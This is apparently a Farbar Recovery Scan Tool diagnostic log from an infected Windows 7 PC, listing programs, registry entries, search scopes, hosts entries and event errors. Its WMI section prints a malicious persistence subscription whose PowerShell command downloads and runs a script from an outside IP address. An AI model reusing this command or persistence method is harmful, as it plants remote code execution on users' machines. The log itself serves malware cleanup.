REALTEK Wireless LAN Software (HKLM-x32\...\{901F0D4C-009D-1112-8DE4-03599E7B0C5C}) (Version: 1.00.10.0329 - REALTEK Semiconductor Corp.)
Recovery Manager (HKLM-x32\...\{44B2A0AB-412E-4F8C-B058-D1E8AECCDFF5}) (Version: 5.5.3023 - CyberLink Corp.) Hidden
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Verizon Cloud (HKLM-x32\...\Verizon Cloud) (Version: 4.1.0 - Verizon Wireless)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
VisualBee for Microsoft PowerPoint (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\VisualBee for Microsoft PowerPoint) (Version: V4.1 - VisualBee.com)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellServiceObjects: MediaCenterSSO Class -> {6FDEDD65-AC51-43CA-B2D0-9EB5D1155D03} => C:\Windows\ehome\ehSSO.dll
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvid.dll [602112 2015-02-10] () [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.r...|powershell.exeIEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (the data entry has 362 more characters).]
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Version 11) (Whitelisted) ==========
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Old Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=fp-yie11
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://www.yahoo.com/?fr=fp-yie11
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> DefaultScope {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {180780f0-b348-4b44-8210-94a8f3ee15b2} URL = hxxp://search.comcast.net/search/?cat=Web&con=toolbar&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {2E85A483-4CB6-4841-BAFE-CFE8617C6789} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {54069629-7150-4432-85AD-826C66E24923} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {8657C459-5075-4FBA-8BFE-4CBF871F2795} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AFDCC033-36F7-40D5-9B8F-98FF5110CF48} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> DefaultScope {EF095A43-3A0C-434D-A6E7-32C433ADDB68} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {751DC1CE-8E0F-4F54-B56B-C1AFDC1E9B1D} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C13F6BAC-A591-4391-A1BF-CB0DF6C9083A} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {EF095A43-3A0C-434D-A6E7-32C433ADDB68} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> DefaultScope {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {29C18FBE-6679-48BA-AFEA-78BBAECB468E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {2C7CA5FC-AE04-47C9-88CB-D32F45776BC9} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://isearch.avg.com/search?cid={FE4CF738-9FF4-4CB8-98D2-738ABE97B40A}&mid=408949922d1347d69a86b1a22fed5e2c-61e095b20595977a30febf70a3c5b2b516e4de0e&lang=us&ds=AVG&pr=fr&d=2011-12-12 09:44:38&v=17.3.0.49&pid=avg&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
DPF: HKLM-x32 {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files (x86)\Yahoo!\Common\Yinsthelper.dll
DPF: HKLM-x32 {5AE58FCF-6F6A-49B2-B064-02492C66E3F4} hxxps://catalog.update.microsoft.com/v7/site/ClientControl/en/x86/MuCatalogWebControl.cab?1648482671878
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\verizon.net -> hxxps://activate.verizon.net
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:34 - 2022-03-29 17:29 - 000000062 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 kr1s.ru
127.0.0.1 zcop.ru
127.0.0.1 sql.4i7i.com
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> %CommonProgramFiles%\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\12.0\DLLShared\
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\Jay\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Control Panel\Desktop\\Wallpaper -> C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: McBootDelayStartSvc => 2
MSCONFIG\Services: McMPFSvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: McODS => 3
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: McProxy => 2
MSCONFIG\Services: MSK80Service => 3
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Restore Points =========================
==================== Faulty Device Manager Devices ============
Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: ========================
Application errors:
==================
Error: (03/29/2022 03:04:08 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Error: (03/29/2022 03:04:08 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Error: (03/28/2022 09:48:46 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Users\Marilyn\Desktop\FRST64.exe ; Description = Restore Point Created by FRST; Error = 0x80042302).
Error: (03/28/2022 09:48:46 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine IVssBackupComponents::SetContextInternal. hr = 0x800706ba, The RPC server is unavailable.
.
Operation:
Add a Volume to a Shadow Copy Set
Context:
Execution Context: Requestor
Error: (03/28/2022 09:25:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: winlogon.exe, version: 6.1.7601.17514, time stamp: 0x4ce79fa6
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000002f8b50
Faulting process id: 0x274
Faulting application start time: 0x01d842f2abd2723a
Faulting application path: C:\Windows\system32\winlogon.exe
Faulting module path: unknown
Report Id: 15371f08-aeff-11ec-825f-60eb6909b7df
Error: (03/28/2022 02:07:31 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Java 7 Update 51; Error = 0x80042302).
Error: (03/28/2022 02:07:31 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine IVssBackupComponents::SetContextInternal. hr = 0x800706ba, The RPC server is unavailable.
.
Operation:
Add a Volume to a Shadow Copy Set
Context:
Execution Context: Requestor
Error: (03/28/2022 02:07:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Java 7 Update 51; Error = 0x80042302).
System errors:
=============
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{4991D34B-80A1-4291-83B6-3328366B9097}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{6D18AD12-BDE3-4393-B311-099C346E6DF9}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{03CA98D6-FF5D-49B8-ABC6-03DD84127020}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{659CDEA7-489E-11D9-A9CD-000D56965251}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{BB6DF56B-CACE-11DC-9992-0019B93A3A84}
Error: (03/29/2022 05:32:54 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service sdrsvc with arguments "" in order to run the server:
{687E55CA-6621-4C41-B9F1-C0EDDC94BB05}
